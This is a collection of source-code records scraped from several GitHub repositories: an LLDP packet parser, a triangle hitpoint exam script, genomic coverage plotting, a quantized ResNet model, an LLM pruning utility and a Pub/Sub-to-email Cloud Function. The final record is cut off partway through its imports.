lldpPayload:\n tlv_header = struct.unpack(\"!H\", lldpPayload[:2])[0]\n tlv_type = tlv_header >> 9\n tlv_len = (tlv_header & 0x01ff)\n lldpDU = lldpPayload[2:tlv_len + 2]\n if tlv_type == 127:\n tlv_oui = lldpDU[:3]\n tlv_subtype = lldpDU[3:4]\n tlv_datafield = lldpDU[4:tlv_len]\n if tlv_oui == \"\\x00\\x80\\xC2\" and tlv_subtype == \"\\x01\":\n vlan_id = struct.unpack(\"!H\", tlv_datafield)[0]\n\n elif tlv_type == 0:\n # TLV Type is ZERO, Breaking the while loop:\n break\n else:\n tlv_subtype = struct.unpack(\"!B\", lldpDU[0:1]) \\\n if tlv_type is 2 else \"\"\n startbyte = 1 if tlv_type is 2 else 0\n tlv_datafield = lldpDU[startbyte:tlv_len]\n\n if tlv_type == 4:\n port_id = tlv_datafield\n elif tlv_type == 5:\n system_name = tlv_datafield\n else:\n pass\n\n lldpPayload = lldpPayload[2 + tlv_len:]\n\n return (system_name, port_id)\n\ndef mac_addr(address):\n \"\"\"\n Convert a MAC address to a readable/printable string\n \"\"\"\n return ':'.join('%02x' % ord(b) for b in address)\n","repo_name":"mattjhayes/nmeta2dpae","sub_path":"nmeta2dpae/tc.py","file_name":"tc.py","file_ext":"py","file_size_in_byte":18368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"3396515355","text":"\"\"\"\r\nExamen 3D Recuperacion\r\nAlexis Saúl Castillo Gonzalez\r\n\"\"\"\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nfrom math import sqrt \r\nimport sys\r\nimport 
keyboard\r\n\r\n#Declaracion del arrgelo\r\nx=[30,40,80,10,40]\r\ny=[10,60,60,10,75]\r\nz=[-10,10,10,0,0]\r\n\r\n#funcion del ploteo de la figura\r\ndef plotPlaneLine(xg,yg,zg,bandera,areaBase,area1,area2):\r\n #Tamaño del grid\r\n plt.title('Alexis Saúl Castillo Gonzales')\r\n plt.axis([0,150,100,0])\r\n plt.axis('on')\r\n plt.grid(True)\r\n plt.xlabel('Eje x')\r\n plt.ylabel('Eje y')\r\n\r\n #Triangulo base\r\n plt.plot([x[0],x[1]],[y[0],y[1]],color='k')\r\n plt.plot([x[1],x[2]],[y[1],y[2]],color='k')\r\n plt.plot([x[2],x[0]],[y[2],y[0]],color='k')\r\n\r\n #Triangulos lados\r\n plt.plot([x[0],x[3]],[y[0],y[3]],linestyle=':',color='r')\r\n plt.plot([x[3],x[1]],[y[3],y[1]],linestyle=':',color='g')\r\n plt.plot([x[3],x[2]],[y[3],y[2]],linestyle=':',color='y')\r\n\r\n #Linea de interseccion\r\n plt.plot([x[3],x[4]],[y[3],y[4]],color='b')\r\n\r\n if(bandera==True):\r\n plt.text(100,60,'Hitpoint dentro del plano')\r\n else:\r\n plt.text(100,60,'Hitpoint fuera del plano')\r\n\r\n areaBase = int(areaBase)\r\n area1 = int(area1)\r\n area2 = int(area2)\r\n\r\n plt.text(100,25,'Area base=')\r\n plt.text(125,25,areaBase)\r\n plt.text(100,35,'Area1=')\r\n plt.text(120,35,area1)\r\n plt.text(100,40,'Area2=')\r\n plt.text(120,40,area2)\r\n plt.text(100,50,'Area1+Area2=')\r\n plt.text(135,50,area1+area2)\r\n plt.show()\r\n\r\ndef hitpoint(x,y,z):\r\n #Triangulo base\r\n #Distancia de 0 a 1\r\n a=x[1]-x[0]\r\n b=y[1]-y[0]\r\n c=z[1]-z[0]\r\n D01=sqrt(a*a+b*b+c*c) \r\n #Distancia de 1 a 2\r\n a=x[2]-x[1]\r\n b=y[2]-y[1]\r\n c=z[2]-z[1]\r\n D12=sqrt(a*a+b*b+c*c) \r\n #Distancia de 0 a 2\r\n a=x[2]-x[0]\r\n b=y[2]-y[0]\r\n c=z[2]-z[0]\r\n D02=sqrt(a*a+b*b+c*c)\r\n #Calcular area con formula de Heron\r\n s=(D01+D12+D02)/2\r\n areaBase=sqrt(s*(s-D01)*(s-D12)*(s-D02))\r\n \r\n #Triangulo 1\r\n #Distancia de 0 a 1\r\n a=x[1]-x[0]\r\n b=y[1]-y[0]\r\n c=z[1]-z[0]\r\n D01=sqrt(a*a+b*b+c*c) \r\n #Distancia de 1 a 3\r\n a=x[3]-x[1]\r\n b=y[3]-y[1]\r\n c=z[3]-z[1]\r\n D13=sqrt(a*a+b*b+c*c) \r\n #Distancia de 0 a 3\r\n a=x[3]-x[0]\r\n b=y[3]-y[0]\r\n c=z[3]-z[0]\r\n D03=sqrt(a*a+b*b+c*c)\r\n #Calcular area con formula de Heron\r\n s=(D01+D13+D03)/2\r\n area1=sqrt(s*(s-D01)*(s-D13)*(s-D03))\r\n\r\n #Triangulo 2\r\n #Distancia de o a 2\r\n a=x[2]-x[0]\r\n b=y[2]-y[0]\r\n c=z[2]-z[0]\r\n D02=sqrt(a*a+b*b+c*c) \r\n #Distancia de 2 a 3\r\n a=x[3]-x[2]\r\n b=y[3]-y[2]\r\n c=z[3]-z[2]\r\n D23=sqrt(a*a+b*b+c*c) \r\n #Distancia de 0 a 3\r\n a=x[3]-x[0]\r\n b=y[3]-y[0]\r\n c=z[3]-z[0]\r\n D03=sqrt(a*a+b*b+c*c)\r\n #Calcular area con formula de Heron\r\n s=(D02+D23+D03)/2\r\n area2=sqrt(s*(s-D02)*(s-D23)*(s-D03))\r\n\r\n #Verificacion del hitpoint\r\n sumaAreas = area1+area2\r\n bandera = True\r\n if(areaBase>sumaAreas):\r\n bandera = True\r\n else:\r\n bandera = False\r\n \r\n #Manda a plotear la figura y etiquetas\r\n plotPlaneLine(x,y,z,bandera,areaBase,area1,area2)\r\n\r\n#inserccion de datos y hitpoint\r\nprint(\"pulsa Enter para continuar o ESC para salir\")\r\nwhile True:\r\n \r\n if keyboard.is_pressed('Esc'):\r\n sys.exit(0)\r\n if keyboard.is_pressed('ENTER'):\r\n tecla=input('-----')\r\n hx=input(\"Hitpoint x:\")\r\n hy=input(\"Hitpoint y:\")\r\n #Asignacion de los arreglos\r\n x[3]=int(hx)\r\n y[3]=int(hy)\r\n hitpoint(x,y,z)\r\n print(\"pulsa Enter para continuar o ESC para 
salir\")\r\n\r\nplt.show()","repo_name":"alexis-saul/examen_recuperacion3d","sub_path":"examen_recuperacion_3d.py","file_name":"examen_recuperacion_3d.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"15461902409","text":"###\n### This script builds histograms from the coverage profile text files.\n###\n\nimport sys,numpy\nimport matplotlib,matplotlib.pyplot\n\nmatplotlib.rcParams.update({'font.size':18,'font.family':'Arial','xtick.labelsize':14,'ytick.labelsize':14})\nmatplotlib.rcParams['pdf.fonttype']=42\n\ndef cdsBlockDefiner(genomicFeature):\n\n '''\n This function defines the CDS blocks for each genomic feature.\n '''\n\n cdsBlocks=[]\n geneIDs=[]\n\n if genomicFeature in riboOperons:\n geneIDs=riboOperons[genomicFeature]\n else:\n geneIDs=[genomicFeature]\n\n for geneID in geneIDs:\n\n start=geneAnnotations[geneID][0]\n end=geneAnnotations[geneID][1]\n strand=geneAnnotations[geneID][2]\n cdsBlocks.append([start,end,strand,geneID])\n\n return cdsBlocks\n\ndef coverageFileReader(dataFileName):\n\n '''\n This function reads the coverage files and returns the positions and the coverage.\n '''\n\n strand=None; experiment=None\n pos=[]; coverage=[]\n with open(dataFileName,'r') as f:\n for line in f:\n vector=line.split()\n\n # f.1. obtaining the metadata\n if vector[1] == 'strand':\n strand=vector[2]\n if vector[1] == 'experiment':\n experiment=vector[2]\n\n # f.2. reading the information\n if vector[0] != '#':\n \n # define which column to read\n if experiment == 'rbf':\n if strand == '+':\n column=1\n elif strand == '-':\n column=2\n else:\n print('Error selecting strand at rbf. Exiting...')\n sys.exit()\n \n elif experiment == 'trna':\n if strand == '+':\n column=2\n elif strand == '-':\n column=1\n else:\n print('Error selecting strand at trna. Exiting...')\n sys.exit()\n else:\n print(experiment)\n print('Error from experiment selection. Exiting...')\n sys.exit()\n \n # read columns\n pos.append(int(vector[0]))\n coverage.append(int(vector[column]))\n\n # dealing with positions\n if strand == '-':\n pos=pos[::-1]\n p=numpy.array(pos)\n normalizedPosition=p-min(p)-margin\n\n return normalizedPosition,coverage\n\ndef dataReader():\n\n '''\n This function reads the ribosomal protein operons and genes.\n '''\n\n # f.1. ribo-pt gene operons\n operonPredictions={}\n fileName=operonPredictionsDir+'riboPtOperons.txt'\n with open(fileName,'r') as f:\n next(f)\n for line in f:\n vector=line.split('\\t')\n name=vector[0]\n genes=[]\n for i in range(len(vector)-1):\n gene=vector[i+1].replace('\\n','')\n genes.append(gene)\n operonPredictions[name]=genes\n\n # f.2. non-operon ribo-pt genes\n NORPGs=[]\n fileName=operonPredictionsDir+'NORPGs.txt'\n with open(fileName,'r') as f:\n next(f)\n for line in f:\n vector=line.split('\\t')\n name=vector[0].replace('\\n','')\n NORPGs.append(name)\n\n # f.3. 
print information about retrieval\n a=[]\n for operon in operonPredictions:\n for name in operonPredictions[operon]:\n if name not in a:\n a.append(name)\n print('\\t Recovered {} genes in {} operons.'.format(len(a),len(operonPredictions)))\n print('\\t Recovered {} genes not in operons.'.format(len(NORPGs)))\n for name in NORPGs:\n if name not in a:\n a.append(name)\n print('\\t Total genes recovered: {}'.format(len(a)))\n \n return operonPredictions,NORPGs\n\ndef figureMaker(genomicFeature,cdsBlocks):\n\n '''\n This function builds a figure of the coverage of reads over genomic features.\n '''\n \n # f.1. iterate over experiments\n for experiment in experiments:\n\n fig=matplotlib.pyplot.figure()\n ax=fig.add_subplot(111)\n heaven=0\n for timepoint in timepoints:\n y=[]\n for replicate in replicates:\n dataFileName='{}{}.{}.{}.{}.txt'.format(coverageDir,timepoint,replicate,genomicFeature,experiment)\n pos,coverage=coverageFileReader(dataFileName)\n y.append(coverage)\n\n # compute PDF \n average=numpy.mean(numpy.array(y),axis=0)\n pdf=average/sum(average)\n if heaven < numpy.max(pdf):\n heaven=numpy.max(pdf)\n\n # define the color\n theColor=colors[timepoints.index(timepoint)]\n\n # plot\n ax.plot(pos,pdf,'-',color=theColor,label=timepoint)\n\n # f.1.2. make boxes\n strand=cdsBlocks[0][2]\n boxSize=heaven*0.1\n postTexty=-boxSize/2\n \n for block in cdsBlocks:\n\n geneName=block[-1]\n boxLabel=synonyms[geneName][0]\n\n # stand-specific options\n if strand == '+':\n\n ref=cdsBlocks[0][0]\n start=block[0]-ref\n end=block[1]-ref\n\n else:\n \n ref=cdsBlocks[-1][1]\n start=ref-block[1]\n end=ref-block[0]\n\n # make boxes\n geneBox=matplotlib.patches.Rectangle(xy=(start,-boxSize),width=(end-start),height=boxSize,fc='white',lw=1,ec='black')\n ax.add_patch(geneBox)\n\n # define text\n posTextx=start+(end-start)/2\n if end-start > 500:\n theFontSize=10\n else:\n theFontSize=7\n ax.text(posTextx,postTexty,boxLabel,color='black',horizontalalignment='center',verticalalignment='center',fontsize=theFontSize)\n\n # f.1.3 final figure closing\n matplotlib.pyplot.xlabel(\"Relative genomic position (5'->3')\")\n matplotlib.pyplot.ylabel('p(coverage)')\n if experiment == 'trna':\n flag='RNA-seq'\n else:\n flag='Ribo-seq'\n\n matplotlib.pyplot.title('{} {}'.format(genomicFeature,flag))\n\n matplotlib.pyplot.legend(markerscale=1.5,framealpha=1,loc=0,ncol=2,fontsize=14)\n\n matplotlib.pyplot.ylim([-1.5*boxSize,boxSize*10.5])\n\n figureName='figures/figure.{}.{}.pdf'.format(genomicFeature,experiment)\n matplotlib.pyplot.tight_layout()\n matplotlib.pyplot.savefig(figureName)\n matplotlib.pyplot.clf()\n\n return None\n\ndef geneAnnotationReader():\n\n geneAnnotations={}\n\n with open(gffFile,'r') as f:\n next(f)\n next(f)\n for line in f:\n vector=line.split('\\t')\n if len(vector) > 3:\n if vector[2] == 'gene': # check if gene and cds match exact position for all\n name=vector[8].split(';')[0].replace('ID=','')\n start=int(vector[3])\n end=int(vector[4])\n strand=vector[6]\n geneAnnotations[name]=[start,end,strand]\n\n return geneAnnotations\n\ndef synonymsReader():\n\n '''\n This function reads the GFF3 file and returns a dictionary with synonyms between old and new locus names.\n '''\n\n synonyms={}\n with open(gffFile,'r') as f:\n for line in f:\n vector=line.split('\\t')\n if vector[0][0] != '#':\n info=vector[-1].replace('\\n','')\n if 'old_locus_tag=' in info:\n old=info.split('old_locus_tag=')[1].split(';')[0]\n new=info.split('ID=')[1].split(';')[0]\n\n if '%' in old:\n olds=old.split('%2C')\n 
synonyms[new]=[old for old in olds]\n else:\n synonyms[new]=[old]\n \n return synonyms\n\n###\n### MAIN\n###\n\n# 0. user defined variables\ncoverageDir='/Volumes/omics4tb/alomana/projects/TLR/data/coverage/'\noperonPredictionsDir='/Volumes/omics4tb/alomana/projects/TLR/data/microbesOnline/'\ngffFile='/Volumes/omics4tb/alomana/projects/TLR/data/genome/alo.build.NC002607.NC001869.NC002608.gff3'\n\ntimepoints=['tp.1','tp.2','tp.3','tp.4']\nreplicates=['rep.1','rep.2','rep.3']\nexperiments=['rbf','trna']\n\ncolors=['red','orange','green','blue']\n\nmargin=0 # excess of base pairs\n\n# 1. read data\nprint('reading data...')\n\n# 1.1. read gff3 file\ngeneAnnotations=geneAnnotationReader()\n\n# 1.2. read operon memberships\nriboOperons,NORPGs=dataReader()\ngenomicFeatures=list(riboOperons.keys())+NORPGs\ngenomicFeatures.sort()\n\ngenomicFeatures=['gene-VNG_RS06605']\n\n# 1.3. define synonyms\nsynonyms=synonymsReader()\n\n# 2. build figure\nprint('building figures...')\n\nfor genomicFeature in genomicFeatures:\n print('building figure for {}...'.format(genomicFeature))\n cdsBlocks=cdsBlockDefiner(genomicFeature)\n figureMaker(genomicFeature,cdsBlocks)\n\nprint('... completed.')\n","repo_name":"adelomana/30sols","sub_path":"SI/extra/coverage/figureMaker.py","file_name":"figureMaker.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"2697400578","text":"import torch.nn as nn\r\nimport torch\r\nimport torch.nn.functional as F\r\nimport sys\r\nimport time\r\nfrom quant_dorefa import *\r\n__all__ = ['net']\r\n\r\nclass resnet(nn.Module):\r\n\r\n def __init__(self):\r\n super(resnet, self).__init__()\r\n\r\n def forward(self, x):\r\n x = self.fq0(x)\r\n x = self.conv1(x)\r\n x = self.bn1(x)\r\n x = self.relu1(x)\r\n x = self.fq1(x)\r\n\r\n residual = x.clone() \r\n out = x.clone()\r\n\r\n out = self.conv2(out)\r\n out = self.bn2(out)\r\n out = self.relu2(out)\r\n out = self.fq2(out)\r\n\r\n out = self.conv3(out)\r\n out = self.bn3(out)\r\n out+=residual\r\n out = self.relu3(out)\r\n out = self.fq3(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv4(out)\r\n out = self.bn4(out)\r\n out = self.relu4(out)\r\n out = self.fq4(out)\r\n\r\n out = self.conv5(out)\r\n out = self.bn5(out)\r\n out+=residual\r\n out = self.relu5(out)\r\n out = self.fq5(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv6(out)\r\n out = self.bn6(out)\r\n out = self.relu6(out)\r\n out = self.fq6(out)\r\n\r\n out = self.conv7(out)\r\n out = self.bn7(out)\r\n out+=residual\r\n out = self.relu7(out)\r\n out = self.fq7(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n #########Layer################ \r\n out = self.conv8(out)\r\n out = self.bn8(out)\r\n out = self.relu8(out)\r\n out = self.fq8(out)\r\n\r\n out = self.conv9(out)\r\n out = self.bn9(out)\r\n residual = self.resconv1(residual)\r\n out+=residual\r\n out = self.relu9(out)\r\n out = self.fq9(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv10(out)\r\n out = self.bn10(out)\r\n out = self.relu10(out)\r\n out = self.fq10(out)\r\n\r\n out = self.conv11(out)\r\n out = self.bn11(out)\r\n out+=residual\r\n out = self.relu11(out)\r\n out = self.fq11(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv12(out)\r\n out = self.bn12(out)\r\n out = self.relu12(out)\r\n out = 
self.fq12(out)\r\n\r\n out = self.conv13(out)\r\n out = self.bn13(out)\r\n out+=residual\r\n out = self.relu13(out)\r\n out = self.fq13(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n #########Layer################ \r\n out = self.conv14(out)\r\n out = self.bn14(out)\r\n out = self.relu14(out)\r\n out = self.fq14(out)\r\n\r\n out = self.conv15(out)\r\n out = self.bn15(out)\r\n residual = self.resconv2(residual)\r\n out+=residual\r\n out = self.relu15(out)\r\n out = self.fq15(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv16(out)\r\n out = self.bn16(out)\r\n out = self.relu16(out)\r\n out = self.fq16(out)\r\n\r\n out = self.conv17(out)\r\n out = self.bn17(out)\r\n out+=residual\r\n out = self.relu17(out)\r\n out = self.fq17(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n out = self.conv18(out)\r\n out = self.bn18(out)\r\n out = self.relu18(out)\r\n out = self.fq18(out)\r\n\r\n out = self.conv19(out)\r\n out = self.bn19(out)\r\n out+=residual\r\n out = self.relu19(out)\r\n out = self.fq19(out)\r\n\r\n residual = out.clone() \r\n ################################### \r\n #########Layer################ \r\n x=out\r\n x = self.avgpool(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.bn20(x)\r\n x = self.fq20(x)\r\n\r\n x = self.fc(x)\r\n x = self.bn21(x)\r\n x = self.logsoftmax(x)\r\n return x\r\n\r\nclass ResNet_cifar(resnet):\r\n\r\n def __init__(self, num_classes=100):\r\n super(ResNet_cifar, self).__init__()\r\n\r\n self.wbit = 8\r\n self.abit = 8\r\n\r\n QConv2d = conv2d_Q_fn(w_bit=self.wbit)\r\n QLinear = linear_Q_fn(w_bit=self.wbit)\r\n\r\n QConv2d_fp = conv2d_Q_fn(w_bit=16)\r\n QLinear_fp = linear_Q_fn(w_bit=16)\r\n \r\n\r\n self.inflate = 1\r\n self.fq0 = activation_quantize_fn(a_bit=self.abit)\r\n self.conv1=nn.Conv2d(3,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn1= nn.BatchNorm2d(16*self.inflate)\r\n self.relu1=nn.ReLU(inplace=True)\r\n self.fq1 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv2=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn2= nn.BatchNorm2d(16*self.inflate)\r\n self.relu2=nn.ReLU(inplace=True)\r\n self.fq2 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv3=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn3= nn.BatchNorm2d(16*self.inflate)\r\n self.relu3=nn.ReLU(inplace=True)\r\n self.fq3 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv4=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn4= nn.BatchNorm2d(16*self.inflate)\r\n self.relu4=nn.ReLU(inplace=True)\r\n self.fq4 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv5=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn5= nn.BatchNorm2d(16*self.inflate)\r\n self.relu5=nn.ReLU(inplace=True)\r\n self.fq5 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv6=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn6= nn.BatchNorm2d(16*self.inflate)\r\n self.relu6=nn.ReLU(inplace=True)\r\n self.fq6 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv7=QConv2d(16*self.inflate,16*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn7= 
nn.BatchNorm2d(16*self.inflate)\r\n self.relu7=nn.ReLU(inplace=True)\r\n self.fq7 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n #########Layer################ \r\n self.conv8=QConv2d(16*self.inflate,32*self.inflate, kernel_size=3, stride=2, padding=1, bias=False)\r\n self.bn8= nn.BatchNorm2d(32*self.inflate)\r\n self.relu8=nn.ReLU(inplace=True)\r\n self.fq8 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv9=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn9= nn.BatchNorm2d(32*self.inflate)\r\n self.resconv1=nn.Sequential(QConv2d(16*self.inflate,32*self.inflate, kernel_size=1, stride=2, padding =0, bias=False),\r\n nn.BatchNorm2d(32*self.inflate),)\r\n self.relu9=nn.ReLU(inplace=True)\r\n self.fq9 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv10=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn10= nn.BatchNorm2d(32*self.inflate)\r\n self.relu10=nn.ReLU(inplace=True)\r\n self.fq10 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv11=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn11= nn.BatchNorm2d(32*self.inflate)\r\n self.relu11=nn.ReLU(inplace=True)\r\n self.fq11 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n #######################################################\r\n\r\n self.conv12=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn12= nn.BatchNorm2d(32*self.inflate)\r\n self.relu12=nn.ReLU(inplace=True)\r\n self.fq12 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv13=QConv2d(32*self.inflate,32*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn13= nn.BatchNorm2d(32*self.inflate)\r\n self.relu13=nn.ReLU(inplace=True)\r\n self.fq13 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n #########Layer################ \r\n self.conv14=QConv2d(32*self.inflate,64*self.inflate, kernel_size=3, stride=2, padding=1, bias=False)\r\n self.bn14= nn.BatchNorm2d(64*self.inflate)\r\n self.relu14=nn.ReLU(inplace=True)\r\n self.fq14 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv15=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn15= nn.BatchNorm2d(64*self.inflate)\r\n self.resconv2=nn.Sequential(QConv2d(32*self.inflate,64*self.inflate, kernel_size=1, stride=2, padding =0, bias=False),\r\n nn.BatchNorm2d(64*self.inflate),)\r\n self.relu15=nn.ReLU(inplace=True)\r\n self.fq15 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv16=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn16= nn.BatchNorm2d(64*self.inflate)\r\n self.relu16=nn.ReLU(inplace=True)\r\n self.fq16 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv17=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn17= nn.BatchNorm2d(64*self.inflate)\r\n self.relu17=nn.ReLU(inplace=True)\r\n self.fq17 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n self.conv18=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn18= nn.BatchNorm2d(64*self.inflate)\r\n 
self.relu18=nn.ReLU(inplace=True)\r\n self.fq18 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.conv19=QConv2d(64*self.inflate,64*self.inflate, kernel_size=3, stride=1, padding=1, bias=False)\r\n self.bn19= nn.BatchNorm2d(64*self.inflate)\r\n self.relu19=nn.ReLU(inplace=True)\r\n self.fq19 = activation_quantize_fn(a_bit=self.abit)\r\n #######################################################\r\n\r\n #########Layer################ \r\n self.avgpool=nn.AvgPool2d(8)\r\n self.bn20= nn.BatchNorm1d(64*self.inflate)\r\n self.fq20 = activation_quantize_fn(a_bit=self.abit)\r\n\r\n self.fc=nn.Linear(64*self.inflate,num_classes, bias=False)\r\n self.bn21= nn.BatchNorm1d(num_classes)\r\n self.logsoftmax=nn.LogSoftmax(dim=1)\r\n\r\n\r\ndef net(**kwargs):\r\n num_classes, depth, dataset = map(\r\n kwargs.get, ['num_classes', 'depth', 'dataset'])\r\n return ResNet_cifar(num_classes=num_classes)\r\n","repo_name":"adarshkosta/HyperX","sub_path":"frozen_quantized_models/resnet20_iofp.py","file_name":"resnet20_iofp.py","file_ext":"py","file_size_in_byte":11091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25168603407","text":"import glob\nimport os\n\nimport torch\n\nfrom llmshearing.models.composer_llama import ComposerMosaicLlama\nfrom llmshearing.utils.utils import load_weights\n\n\ndef prune_and_save_model(path):\n \"\"\" prune and save the model after pruning \"\"\"\n outpath = os.path.dirname(path) + f\"/pruned-{os.path.basename(path)}\"\n config_file = os.path.join(os.path.dirname(path), \"config.pt\")\n assert os.path.exists(config_file), f\"Config file {config_file} does not exist\"\n \n cfg = torch.load(config_file).model\n if cfg.l0_module.target_model is not None:\n cfg.l0_module.eval_target_model = True # hack\n \n model = ComposerMosaicLlama(cfg)\n weights = load_weights(path)\n \n ree = model.load_state_dict(weights, strict=False)\n print(ree)\n \n model.prune_params() \n model.model.l0_module = None\n model_state_dict = model.state_dict()\n new_weights = change_keys(model_state_dict)\n torch.save(new_weights, outpath)\n print(\"Saved pruned model to path: \", outpath)\n \n\ndef change_keys(weights, output_file=None):\n \"\"\" rename the keys in the weight file to match the new model \"\"\"\n exitsing_layers = []\n for key in weights:\n if \"blocks\" in key and \"rotary\" not in key:\n layer = int(key[key.index(\"blocks\") + len(\"blocks.\"):].split(\".\")[0])\n if layer not in exitsing_layers:\n exitsing_layers.append(layer)\n exitsing_layers = sorted(exitsing_layers)\n print(\"Existing layers: \", len(exitsing_layers), exitsing_layers)\n \n new_weights = {}\n for key in weights:\n if \"rotary\" in key:\n continue\n if \"blocks\" in key:\n layer_index = key.index(\"blocks\") + len(\"blocks.\")\n text_before_layer_index = key[:layer_index]\n layer = int(key[layer_index:].split(\".\")[0])\n text_after_layer_index = key[layer_index + len(str(layer)) + 1:]\n current_layer = exitsing_layers.index(layer)\n new_key = text_before_layer_index + str(current_layer) + \".\" + text_after_layer_index\n print(\"Old param key:\", key)\n print(\"New param key:\", new_key)\n else:\n new_key = key\n new_weights[new_key] = weights[key]\n if output_file is not None:\n torch.save(new_weights, output_file)\n else:\n return new_weights\n \nif __name__ == \"__main__\":\n import fire\n 
fire.Fire()","repo_name":"princeton-nlp/LLM-Shearing","sub_path":"llmshearing/utils/post_pruning_processing.py","file_name":"post_pruning_processing.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":217,"dataset":"github-code","pt":"20"} +{"seq_id":"36171903061","text":"def pubsub_sendmail(event, context):\n import base64\n import os\n import smtplib\n from email.message import EmailMessage\n\n # Log the message ID and timestamp.\n\n print('BEGIN messageId {} published at {}'.format(context.event_id, context.timestamp))\n\n # Fetch environment variables and set to '' if they are not present.\n # Remove leading and trailing spaces.\n\n mailFrom = os.environ.get('MAIL_FROM', '').strip()\n mailTo = os.environ.get('MAIL_TO', '').strip()\n mailSubject = os.environ.get('MAIL_SUBJECT', '').strip()\n mailServer = os.environ.get('MAIL_SERVER', '').strip()\n mailLocalHost = os.environ.get('MAIL_LOCAL_HOST', '').strip()\n mailForceTls = os.environ.get('MAIL_FORCE_TLS', '').strip()\n mailDebug = os.environ.get('MAIL_DEBUG', '').strip()\n\n # Fetch the pub/sub message and set to '' if not present.\n\n if 'data' in event:\n mailMessageBody = base64.b64decode(event['data']).decode('utf-8')\n else:\n mailMessageBody = ''\n\n debugFlag = mailDebug == \"TRUE\"\n forceTlsFlag = mailForceTls == \"TRUE\"\n\n # Log all of the environment variables.\n\n if debugFlag:\n print('Mail from: {}'.format(mailFrom))\n print('Mail to: {}'.format(mailTo))\n print('Mail subject: {}'.format(mailSubject))\n print('Mail server: {}'.format(mailServer))\n print('Mail local host: {}'.format(mailLocalHost))\n print('Mail force TLS: {}'.format(mailForceTls))\n print('Mail message body: {}'.format(mailMessageBody))\n\n # Create EmailMessage object for eventual transmission.\n\n outboundMessage = EmailMessage()\n outboundMessage.set_content(mailMessageBody)\n outboundMessage['Subject'] = mailSubject\n outboundMessage['From'] = mailFrom\n outboundMessage['To'] = mailTo\n\n # You may need to customize this flow to support your mail relay configuration.\n # Examples may include authentication, encryption, etc.\n\n if forceTlsFlag:\n smtpServer = smtplib.SMTP_SSL(host=mailServer, local_hostname=mailLocalHost)\n else:\n smtpServer = smtplib.SMTP(host=mailServer, local_hostname=mailLocalHost)\n\n if debugFlag:\n smtpServer.set_debuglevel(2)\n\n if (not forceTlsFlag) and smtpServer.has_extn('STARTTLS'):\n smtpServer.starttls()\n smtpServer.ehlo()\n\n smtpServer.send_message(outboundMessage)\n smtpServer.quit()\n\n # Log end of Cloud Function.\n\n print('END messageId {}'.format(context.event_id))\n","repo_name":"GoogleCloudPlatform/cloud-pubsub-sendmail","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"20"} +{"seq_id":"29298859088","text":"import datetime\nimport os.path\nimport re\nimport time\nfrom base64 